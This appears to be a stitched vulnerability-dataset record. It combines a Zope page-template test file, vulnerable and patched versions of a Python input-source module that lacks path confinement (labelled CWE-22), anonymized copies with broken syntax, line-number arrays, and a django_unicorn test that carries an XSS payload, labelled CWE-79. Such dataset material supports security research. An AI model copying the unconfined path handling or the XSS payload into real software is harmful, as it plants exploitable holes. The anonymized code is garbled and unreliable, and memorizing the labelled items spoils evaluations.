from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises(NotFound):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| [
2,
5,
6,
8,
14,
17,
19,
21,
23,
26,
29,
33,
36,
42,
50,
51,
55,
59,
61,
71,
75,
79,
83,
87,
92,
96,
98,
99,
100,
103,
107,
111,
115,
119,
123,
127,
131,
135,
142,
148,
154,
158,
162,
166,
170,
172,
175,
176,
180,
182,
188,
189,
198,
204,
205,
207,
211,
212,
213,
218,
222,
223,
225,
229,
230,
231,
235,
239,
240,
242,
255,
268,
280,
293,
294,
296,
300,
307,
312,
317,
322,
324,
329
] | [
3,
7,
8,
10,
16,
19,
21,
23,
25,
28,
31,
35,
38,
44,
52,
53,
57,
61,
63,
73,
77,
81,
85,
89,
94,
98,
100,
101,
102,
105,
109,
111,
112,
117,
121,
125,
129,
133,
137,
141,
148,
154,
160,
164,
168,
172,
176,
178,
181,
182,
186,
188,
194,
195,
204,
210,
211,
213,
217,
218,
219,
224,
228,
230,
232,
235,
238,
241,
242,
244,
248,
249,
250,
254,
258,
259,
261,
274,
287,
299,
312,
313,
315,
319,
326,
331,
336,
341,
343,
348
] |
0CWE-22
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import datetime
from typing import List, Optional
import attr
import requests
import tenacity
from .Line import Line
@attr.s(auto_attribs=True)
class InputContent:
rawLines: List[str]
date: Optional[datetime.date]
@property
def lines(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def content(self) -> str:
return "".join(self.rawLines)
class InputSource:
"""Represents a thing that can produce specification input text.
Input can be read from stdin ("-"), an HTTPS URL, or a file. Other
InputSources can be found relative to URLs and files, and there's a context
manager for temporarily switching to the directory of a file InputSource.
"""
def __new__(cls, sourceName: str):
"""Dispatches to the right subclass."""
if cls != InputSource:
# Only take control of calls to InputSource(...) itself.
return super().__new__(cls)
if sourceName == "-":
return StdinInputSource(sourceName)
if sourceName.startswith("https:"):
return UrlInputSource(sourceName)
return FileInputSource(sourceName)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
@abstractmethod
def read(self) -> InputContent:
"""Fully reads the source."""
def hasDirectory(self) -> bool:
"""Only some InputSources have a directory."""
return False
def directory(self) -> str:
"""Suitable for passing to subprocess(cwd=)."""
raise TypeError("{} instances don't have directories.".format(type(self)))
def relative(self, _) -> Optional[InputSource]:
"""Resolves relativePath relative to this InputSource.
For example, InputSource("/foo/bar/baz.txt").relative("quux/fuzzy.txt")
will be InputSource("/foo/bar/quux/fuzzy.txt").
If this source type can't find others relative to itself, returns None.
"""
return None
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this source, if that's known."""
return None
def cheaplyExists(self, _) -> Optional[bool]:
"""If it's cheap to determine, returns whether relativePath exists.
Otherwise, returns None.
"""
return None
def __getattr__(self, name):
"""Hack to make pylint happy, since all the attrs are defined
on the subclasses that __new__ dynamically dispatches to.
See https://stackoverflow.com/a/60731663/455535
"""
print(f"No member '{name}' contained in InputSource.")
return ""
class StdinInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName == "-"
self.type = "stdin"
self.sourceName = sourceName
self.content = None
def __str__(self) -> str:
return "-"
def read(self) -> InputContent:
return InputContent(sys.stdin.readlines(), None)
class UrlInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName.startswith("https:")
self.sourceName = sourceName
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def _fetch(self):
response = requests.get(self.sourceName, timeout=10)
if response.status_code == 404:
# This matches the OSErrors expected by older uses of
# FileInputSource. It skips the retry, since the server has given us
# a concrete, expected answer.
raise FileNotFoundError(errno.ENOENT, response.text, self.sourceName)
response.raise_for_status()
return response
def read(self) -> InputContent:
response = self._fetch()
date = None
if "Date" in response.headers:
# Use the response's Date header, although servers don't always set
# this according to the last change to the file.
date = email.utils.parsedate_to_datetime(response.headers["Date"]).date()
return InputContent(response.text.splitlines(True), date)
def relative(self, relativePath) -> UrlInputSource:
return UrlInputSource(urllib.parse.urljoin(self.sourceName, relativePath))
class FileInputSource(InputSource):
def __init__(self, sourceName: str):
self.sourceName = sourceName
self.type = "file"
self.content = None
def __str__(self) -> str:
return self.sourceName
def read(self) -> InputContent:
with open(self.sourceName, encoding="utf-8") as f:
return InputContent(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def hasDirectory(self) -> bool:
return True
def directory(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def relative(self, relativePath) -> FileInputSource:
return FileInputSource(os.path.join(self.directory(), relativePath))
def cheaplyExists(self, relativePath) -> bool:
return os.access(self.relative(relativePath).sourceName, os.R_OK)
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this file, or None if it doesn't exist."""
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import datetime
from typing import List, Optional
import attr
import requests
import tenacity
from . import config
from .Line import Line
@attr.s(auto_attribs=True)
class InputContent:
rawLines: List[str]
date: Optional[datetime.date]
@property
def lines(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def content(self) -> str:
return "".join(self.rawLines)
class InputSource:
"""Represents a thing that can produce specification input text.
Input can be read from stdin ("-"), an HTTPS URL, or a file. Other
InputSources can be found relative to URLs and files, and there's a context
manager for temporarily switching to the directory of a file InputSource.
"""
def __new__(cls, sourceName: str, **kwargs):
"""Dispatches to the right subclass."""
if cls != InputSource:
# Only take control of calls to InputSource(...) itself.
return super().__new__(cls)
if sourceName == "-":
return StdinInputSource(sourceName, **kwargs)
if sourceName.startswith("https:"):
return UrlInputSource(sourceName, **kwargs)
return FileInputSource(sourceName, **kwargs)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
@abstractmethod
def read(self) -> InputContent:
"""Fully reads the source."""
def hasDirectory(self) -> bool:
"""Only some InputSources have a directory."""
return False
def directory(self) -> str:
"""Suitable for passing to subprocess(cwd=)."""
raise TypeError("{} instances don't have directories.".format(type(self)))
def relative(self, _) -> Optional[InputSource]:
"""Resolves relativePath relative to this InputSource.
For example, InputSource("/foo/bar/baz.txt").relative("quux/fuzzy.txt")
will be InputSource("/foo/bar/quux/fuzzy.txt").
If this source type can't find others relative to itself, returns None.
"""
return None
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this source, if that's known."""
return None
def cheaplyExists(self, _) -> Optional[bool]:
"""If it's cheap to determine, returns whether relativePath exists.
Otherwise, returns None.
"""
return None
def __getattr__(self, name):
"""Hack to make pylint happy, since all the attrs are defined
on the subclasses that __new__ dynamically dispatches to.
See https://stackoverflow.com/a/60731663/455535
"""
print(f"No member '{name}' contained in InputSource.")
return ""
class StdinInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName == "-"
self.type = "stdin"
self.sourceName = sourceName
self.content = None
def __str__(self) -> str:
return "-"
def read(self) -> InputContent:
return InputContent(sys.stdin.readlines(), None)
class UrlInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName.startswith("https:")
self.sourceName = sourceName
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def _fetch(self):
response = requests.get(self.sourceName, timeout=10)
if response.status_code == 404:
# This matches the OSErrors expected by older uses of
# FileInputSource. It skips the retry, since the server has given us
# a concrete, expected answer.
raise FileNotFoundError(errno.ENOENT, response.text, self.sourceName)
response.raise_for_status()
return response
def read(self) -> InputContent:
response = self._fetch()
date = None
if "Date" in response.headers:
# Use the response's Date header, although servers don't always set
# this according to the last change to the file.
date = email.utils.parsedate_to_datetime(response.headers["Date"]).date()
return InputContent(response.text.splitlines(True), date)
def relative(self, relativePath) -> UrlInputSource:
return UrlInputSource(urllib.parse.urljoin(self.sourceName, relativePath))
class FileInputSource(InputSource):
def __init__(self, sourceName: str, *, chroot: bool, chrootPath: Optional[str] = None):
self.sourceName = sourceName
self.chrootPath = chrootPath
self.type = "file"
self.content = None
if chroot and self.chrootPath is None:
self.chrootPath = self.directory()
if self.chrootPath is not None:
self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)
def __str__(self) -> str:
return self.sourceName
def read(self) -> InputContent:
with open(self.sourceName, encoding="utf-8") as f:
return InputContent(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def hasDirectory(self) -> bool:
return True
def directory(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def relative(self, relativePath) -> FileInputSource:
return FileInputSource(os.path.join(self.directory(), relativePath), chroot=False, chrootPath=self.chrootPath)
def cheaplyExists(self, relativePath) -> bool:
return os.access(self.relative(relativePath).sourceName, os.R_OK)
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this file, or None if it doesn't exist."""
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| path_disclosure | {
"code": [
" def __new__(cls, sourceName: str):",
" return StdinInputSource(sourceName)",
" return UrlInputSource(sourceName)",
" return FileInputSource(sourceName)",
" def __init__(self, sourceName: str):",
" return FileInputSource(os.path.join(self.directory(), relativePath))"
],
"line_no": [
41,
48,
50,
51,
160,
182
]
} | {
"code": [
"from . import config",
" return StdinInputSource(sourceName, **kwargs)",
" return UrlInputSource(sourceName, **kwargs)",
" def __init__(self, sourceName: str, *, chroot: bool, chrootPath: Optional[str] = None):",
" self.chrootPath = chrootPath",
" self.chrootPath = self.directory()",
" if self.chrootPath is not None:",
" self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)",
" return FileInputSource(os.path.join(self.directory(), relativePath), chroot=False, chrootPath=self.chrootPath)"
],
"line_no": [
16,
49,
51,
161,
163,
168,
169,
170,
189
]
} | from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import .datetime
from typing import List, Optional
import attr
import requests
import tenacity
from .Line import Line
@attr.s(auto_attribs=True)
class CLASS_0:
rawLines: List[str]
VAR_7: Optional[datetime.date]
@property
def FUNC_0(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def FUNC_1(self) -> str:
return "".join(self.rawLines)
class CLASS_1:
def __new__(VAR_0, VAR_1: str):
if VAR_0 != CLASS_1:
return super().__new__(VAR_0)
if VAR_1 == "-":
return CLASS_2(VAR_1)
if VAR_1.startswith("https:"):
return CLASS_3(VAR_1)
return CLASS_4(VAR_1)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, VAR_2):
return str(self) == str(VAR_2)
@abstractmethod
def FUNC_2(self) -> CLASS_0:
def FUNC_3(self) -> bool:
return False
def FUNC_4(self) -> str:
raise TypeError("{} instances don't have directories.".format(type(self)))
def FUNC_5(self, VAR_3) -> Optional[CLASS_1]:
return None
def FUNC_6(self) -> Optional[float]:
return None
def FUNC_7(self, VAR_3) -> Optional[bool]:
return None
def __getattr__(self, VAR_4):
print(f"No member '{VAR_4}' contained in CLASS_1.")
return ""
class CLASS_2(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1 == "-"
self.type = "stdin"
self.sourceName = VAR_1
self.content = None
def __str__(self) -> str:
return "-"
def FUNC_2(self) -> CLASS_0:
return CLASS_0(sys.stdin.readlines(), None)
class CLASS_3(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1.startswith("https:")
self.sourceName = VAR_1
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def FUNC_8(self):
VAR_6 = requests.get(self.sourceName, timeout=10)
if VAR_6.status_code == 404:
raise FileNotFoundError(errno.ENOENT, VAR_6.text, self.sourceName)
VAR_6.raise_for_status()
return VAR_6
def FUNC_2(self) -> CLASS_0:
VAR_6 = self._fetch()
VAR_7 = None
if "Date" in VAR_6.headers:
VAR_7 = email.utils.parsedate_to_datetime(VAR_6.headers["Date"]).date()
return CLASS_0(VAR_6.text.splitlines(True), VAR_7)
def FUNC_5(self, VAR_5) -> CLASS_3:
return CLASS_3(urllib.parse.urljoin(self.sourceName, VAR_5))
class CLASS_4(CLASS_1):
def __init__(self, VAR_1: str):
self.sourceName = VAR_1
self.type = "file"
self.content = None
def __str__(self) -> str:
return self.sourceName
def FUNC_2(self) -> CLASS_0:
with open(self.sourceName, encoding="utf-8") as f:
return CLASS_0(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def FUNC_3(self) -> bool:
return True
def FUNC_4(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def FUNC_5(self, VAR_5) -> CLASS_4:
return CLASS_4(os.path.join(self.directory(), VAR_5))
def FUNC_7(self, VAR_5) -> bool:
return os.access(self.relative(VAR_5).sourceName, os.R_OK)
def FUNC_6(self) -> Optional[float]:
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import .datetime
from typing import List, Optional
import attr
import requests
import tenacity
from . import config
from .Line import Line
@attr.s(auto_attribs=True)
class CLASS_0:
rawLines: List[str]
VAR_10: Optional[datetime.date]
@property
def FUNC_0(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def FUNC_1(self) -> str:
return "".join(self.rawLines)
class CLASS_1:
def __new__(VAR_0, VAR_1: str, **VAR_2):
if VAR_0 != CLASS_1:
return super().__new__(VAR_0)
if VAR_1 == "-":
return CLASS_2(VAR_1, **VAR_2)
if VAR_1.startswith("https:"):
return CLASS_3(VAR_1, **VAR_2)
return CLASS_4(VAR_1, **VAR_2)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, VAR_3):
return str(self) == str(VAR_3)
@abstractmethod
def FUNC_2(self) -> CLASS_0:
def FUNC_3(self) -> bool:
return False
def FUNC_4(self) -> str:
raise TypeError("{} instances don't have directories.".format(type(self)))
def FUNC_5(self, VAR_4) -> Optional[CLASS_1]:
return None
def FUNC_6(self) -> Optional[float]:
return None
def FUNC_7(self, VAR_4) -> Optional[bool]:
return None
def __getattr__(self, VAR_5):
print(f"No member '{VAR_5}' contained in CLASS_1.")
return ""
class CLASS_2(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1 == "-"
self.type = "stdin"
self.sourceName = VAR_1
self.content = None
def __str__(self) -> str:
return "-"
def FUNC_2(self) -> CLASS_0:
return CLASS_0(sys.stdin.readlines(), None)
class CLASS_3(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1.startswith("https:")
self.sourceName = VAR_1
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def FUNC_8(self):
VAR_9 = requests.get(self.sourceName, timeout=10)
if VAR_9.status_code == 404:
raise FileNotFoundError(errno.ENOENT, VAR_9.text, self.sourceName)
VAR_9.raise_for_status()
return VAR_9
def FUNC_2(self) -> CLASS_0:
VAR_9 = self._fetch()
VAR_10 = None
if "Date" in VAR_9.headers:
VAR_10 = email.utils.parsedate_to_datetime(VAR_9.headers["Date"]).date()
return CLASS_0(VAR_9.text.splitlines(True), VAR_10)
def FUNC_5(self, VAR_6) -> CLASS_3:
return CLASS_3(urllib.parse.urljoin(self.sourceName, VAR_6))
class CLASS_4(CLASS_1):
def __init__(self, VAR_1: str, *, VAR_7: bool, VAR_8: Optional[str] = None):
self.sourceName = VAR_1
self.chrootPath = VAR_8
self.type = "file"
self.content = None
if VAR_7 and self.chrootPath is None:
self.chrootPath = self.directory()
if self.chrootPath is not None:
self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)
def __str__(self) -> str:
return self.sourceName
def FUNC_2(self) -> CLASS_0:
with open(self.sourceName, encoding="utf-8") as f:
return CLASS_0(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def FUNC_3(self) -> bool:
return True
def FUNC_4(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def FUNC_5(self, VAR_6) -> CLASS_4:
return CLASS_4(os.path.join(self.directory(), VAR_6), VAR_7=False, VAR_8=self.chrootPath)
def FUNC_7(self, VAR_6) -> bool:
return os.access(self.relative(VAR_6).sourceName, os.R_OK)
def FUNC_6(self) -> Optional[float]:
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| [
2,
11,
15,
17,
18,
23,
27,
31,
32,
35,
40,
44,
46,
52,
56,
59,
62,
65,
69,
73,
77,
80,
83,
87,
91,
94,
98,
106,
107,
114,
117,
120,
121,
127,
130,
139,
140,
141,
145,
150,
151,
154,
157,
158,
164,
167,
174,
177,
180,
183,
186,
193,
34,
35,
36,
37,
38,
39,
42,
68,
71,
75,
79,
80,
81,
82,
83,
84,
85,
89,
93,
94,
95,
96,
100,
101,
102,
103,
188
] | [
2,
11,
15,
18,
19,
24,
28,
32,
33,
36,
41,
45,
47,
53,
57,
60,
63,
66,
70,
74,
78,
81,
84,
88,
92,
95,
99,
107,
108,
115,
118,
121,
122,
128,
131,
140,
141,
142,
146,
151,
152,
155,
158,
159,
166,
171,
174,
181,
184,
187,
190,
193,
200,
35,
36,
37,
38,
39,
40,
43,
69,
72,
76,
80,
81,
82,
83,
84,
85,
86,
90,
94,
95,
96,
97,
101,
102,
103,
104,
195
] |
1CWE-79
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class ExampleComponent(UnicornView):
name = "World"
def get_name(self):
return "World"
@pytest.fixture()
def component():
return ExampleComponent(component_id="asdf1234", component_name="example")
def test_init_with_template_name():
class TestComponent(UnicornView):
template_name = "unicorn/test.html"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name == "unicorn/test.html"
def test_init_with_get_template_names():
class TestComponent(UnicornView):
def get_template_names(self):
return []
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name is None
def test_init_attribute_names_cache(component):
attribute_names_cache = component._attribute_names_cache
assert len(attribute_names_cache) == 1
assert attribute_names_cache[0] == "name"
def test_init_attribute_names(component):
attribute_names = component._attribute_names()
assert len(attribute_names) == 1
assert attribute_names[0] == "name"
def test_init_attributes(component):
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_properties():
class TestComponent(UnicornView):
@property
def name(self):
return "World"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_methods_cache(component):
assert len(component._methods_cache) == 1
def test_init_methods(component):
methods = component._methods()
assert len(methods) == 1
assert methods["get_name"]() == "World"
def test_get_frontend_context_variables(component):
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert frontend_context_variables_dict.get("name") == "World"
def test_get_frontend_context_variables_xss(component):
# Set component.name to a potential XSS attack
component.name = '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert (
frontend_context_variables_dict.get("name")
== "<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>"
)
def test_get_frontend_context_variables_safe(component):
# Set component.name to a potential XSS attack
component.name = '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
class Meta:
safe = [
"name",
]
setattr(component, "Meta", Meta())
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert (
frontend_context_variables_dict.get("name")
== '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
)
def test_get_context_data(component):
context_data = component.get_context_data()
assert (
len(context_data) == 4
) # `unicorn` and `view` are added to context data by default
assert context_data.get("name") == "World"
